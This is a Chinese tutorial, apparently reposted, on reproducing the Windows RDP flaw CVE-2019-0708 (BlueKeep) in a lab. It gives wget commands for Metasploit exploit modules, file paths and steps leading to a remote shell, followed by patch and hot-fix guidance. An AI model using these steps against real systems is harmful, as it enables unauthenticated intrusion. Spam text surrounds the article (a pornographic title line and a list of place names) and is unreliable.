中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
  • 首頁 > 
  • 教程 > 
  • 服務器 > 
  • Windows CVE-2019-0708 遠程桌面代碼執行漏洞復現問題

Windows CVE-2019-0708 遠程桌面代碼執行漏洞復現問題

發布時間:2020-10-19 22:24:33 來源:腳本之家 閱讀:207 作者:雨中落葉 欄目:服務器

一、漏洞說明

2019年5月15日微軟發布安全補丁修復了CVE編號為CVE-2019-0708的Windows遠程桌面服務(RDP)遠程代碼執行漏洞,該漏洞在不需身份認證的情況下即可遠程觸發,危害與影響面極大。

目前,9月7日EXP代碼已被公開發布至metasploit-framework的Pull requests中,經測試已經可以遠程代碼執行。

二、漏洞影響版本

Windows 7

Windows server 2008 R2

Windows server 2008

Windows 2003

Windows xp

注:Windows 8和windows10以及之后的版本不受此漏洞影響

三、漏洞環境搭建

攻擊機:kali 2018.2

靶機:win7 sp1 7061

  Windows CVE-2019-0708 遠程桌面代碼執行漏洞復現問題

四、漏洞復現

1、更新msf

apt-get update

apt-get install metasploit-framework

  Windows CVE-2019-0708 遠程桌面代碼執行漏洞復現問題

2、下載攻擊套件

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

3、替換msf中相應的文件 

cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

rdp.rb 替換 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb

rdp_scanner.rb 替換 /usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb 替換 /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

4、啟動msf,加載文件

  Windows CVE-2019-0708 遠程桌面代碼執行漏洞復現問題

5、搜索0708,可以看到文件成功加載

  Windows CVE-2019-0708 遠程桌面代碼執行漏洞復現問題

6、利用漏洞,設置rhosts、target、payload

  Windows CVE-2019-0708 遠程桌面代碼執行漏洞復現問題

  Windows CVE-2019-0708 遠程桌面代碼執行漏洞復現問題

  Windows CVE-2019-0708 遠程桌面代碼執行漏洞復現問題

  Windows CVE-2019-0708 遠程桌面代碼執行漏洞復現問題

7、開始執行exp,成功獲得shell

  Windows CVE-2019-0708 遠程桌面代碼執行漏洞復現問題

  Windows CVE-2019-0708 遠程桌面代碼執行漏洞復現問題

五、漏洞防御

1、熱補丁修復工具下載,下載地址: https://www.qianxin.com/other/CVE-2019-0708

注: CVE-2019-0708熱補丁工具”是針對“Windows遠程桌面服務的遠程代碼執行漏洞CVE-2019-0708”推出的熱補丁修復工具,可以針對不能直接打補丁環境,提供的臨時解決漏洞問題的方案。 

 下載文件進行解壓。
2、 使用win+R快捷鍵或開始菜單選擇“運行”,輸入cmd。調起命令行工具。
3、 在命令行工具,執行命令到工具所在文件夾
4、 輸入命令對應功能,啟用熱補丁命令:QKShield.exe /enable ;禁用熱補丁命令:QKShield.exe/disable 。
5、 重啟系統后,需要重新運行命令行來啟用熱補丁

2、啟用熱補丁

  Windows CVE-2019-0708 遠程桌面代碼執行漏洞復現問題

3、再次檢測是否存在漏洞,可以看到打完熱補丁之后,不存在漏洞了

  Windows CVE-2019-0708 遠程桌面代碼執行漏洞復現問題

4、打補丁,漏洞修復工具下載,下載地址: https://www.qianxin.com/other/CVE-2019-0708

  Windows CVE-2019-0708 遠程桌面代碼執行漏洞復現問題

5、點擊”立即修復”,完成安裝之后,重啟電腦

  Windows CVE-2019-0708 遠程桌面代碼執行漏洞復現問題

  Windows CVE-2019-0708 遠程桌面代碼執行漏洞復現問題

6、使用漏洞掃描工具檢測是否存在漏洞,掃描工具下載地址: https://www.qianxin.com/other/CVE-2019-0708

  Windows CVE-2019-0708 遠程桌面代碼執行漏洞復現問題

總結

以上所述是小編給大家介紹的Windows CVE-2019-0708 遠程桌面代碼執行漏洞復現問題,希望對大家有所幫助,如果大家有任何疑問請給我留言,小編會及時回復大家的。在此也非常感謝大家對億速云網站的支持!
如果你覺得本文對你有幫助,歡迎轉載,煩請注明出處,謝謝!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

柘荣县| 雅江县| 江永县| 海门市| 全椒县| 华亭县| 梁山县| 乌拉特后旗| 新巴尔虎左旗| 永新县| 永和县| 潼关县| 禹城市| 武功县| 淳安县| 利津县| 荔波县| 中卫市| 屏南县| 凤庆县| 勐海县| 天柱县| 资中县| 翁源县| 色达县| 肥城市| 新乡市| 广昌县| 抚松县| 安国市| 武山县| 延吉市| 邯郸县| 女性| 宁南县| 江山市| 谢通门县| 金川县| 伊川县| 荣昌县| 方山县|